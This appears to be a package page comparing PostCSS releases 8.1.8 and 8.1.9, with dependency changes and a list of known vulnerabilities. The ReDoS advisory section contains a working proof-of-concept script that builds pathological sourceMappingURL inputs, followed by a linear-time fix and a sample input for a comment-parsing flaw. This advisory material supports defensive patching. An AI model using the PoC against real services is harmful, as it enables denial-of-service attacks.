PostCSS version 8.1.9 is a small update following version 8.1.8, refining the tooling for transforming CSS with JavaScript plugins. Both versions share the same core purpose: letting developers manipulate and enhance CSS programmatically and precisely. Key dependencies such as Colorette (colored console output) and Source Map are unchanged, so debugging and build behaviour stay consistent between the two releases.
A few subtle but noteworthy changes set 8.1.9 apart. One is the updated dependency on "nanoid", which moves from version 3.1.16 to 3.1.18. Nanoid is a small, secure, URL-friendly unique string ID generator, often used to create unique identifiers inside PostCSS plugins. Although minor on its face, this bump most likely picks up security fixes or performance improvements made in the nanoid library itself.
Another change is that the "line-column" dependency used by version 8.1.8 is replaced by "vfile-location" in version 8.1.9. This points to a change in how PostCSS locates specific lines and columns within source files. "vfile-location" likely offers a more robust or feature-rich approach to source file navigation, which could improve error reporting and source map accuracy. For plugin authors and PostCSS users this can mean more precise debugging support and more reliable identification of the exact location of problems within CSS stylesheets.
The two-day gap between release dates (November 21 for 8.1.9 versus November 19 for 8.1.8) shows rapid iteration and an active development cycle focused on continuous improvement. Choosing the latest version (8.1.9) gives developers the most up-to-date features, bug fixes, and security enhancements for their CSS processing workflows.
All vulnerabilities affecting version 8.1.9 of the package
Regular Expression Denial of Service in postcss
The npm package postcss, in versions from 7.0.0 and before 7.0.36, and in 8.x versions before 8.2.10, is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
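As an added example that is not PostCSS's own code, the following extracts the sourceMappingURL annotation with plain string searches instead of the backtracking-prone regex quoted above, so an input built like the one in the PoC is handled in linear time; treating the "#" after "/*" as optional and returning null for an unclosed comment are assumptions made here.

```javascript
// Added example, not PostCSS's own code: find the last
// "/*# sourceMappingURL=... */" annotation without a backtracking regex.
// Every step is indexOf/lastIndexOf or a short single-character walk, so the
// cost stays linear in css.length no matter how many unterminated
// "/*# sourceMappingURL=" fragments the input contains.
const MARKER = 'sourceMappingURL=';

function isSpace(ch) {
  return ch === ' ' || ch === '\t' || ch === '\n' || ch === '\r' || ch === '\f';
}

// Returns the annotation URL, or null when there is no complete
// "/* ... sourceMappingURL=... */" comment. The '#' is treated as optional
// (assumption), and an unclosed comment yields null rather than a guess.
function getAnnotationURL(css) {
  let pos = css.lastIndexOf(MARKER);
  while (pos !== -1) {
    // Walk backwards over optional whitespace and an optional '#' to confirm
    // that this marker really sits at the start of a comment.
    let i = pos - 1;
    while (i >= 0 && isSpace(css[i])) i--;
    if (i >= 0 && css[i] === '#') i--;
    while (i >= 0 && isSpace(css[i])) i--;
    if (i >= 1 && css[i] === '*' && css[i - 1] === '/') {
      const start = pos + MARKER.length;
      const end = css.indexOf('*/', start);
      if (end === -1) return null; // unclosed comment: no valid annotation
      return css.slice(start, end).trim();
    }
    // The marker was not in a comment opener (e.g. inside a string value);
    // try the previous occurrence. Guard pos === 0 so we never loop forever.
    pos = pos === 0 ? -1 : css.lastIndexOf(MARKER, pos - 1);
  }
  return null;
}
```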
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contain parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts will be included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.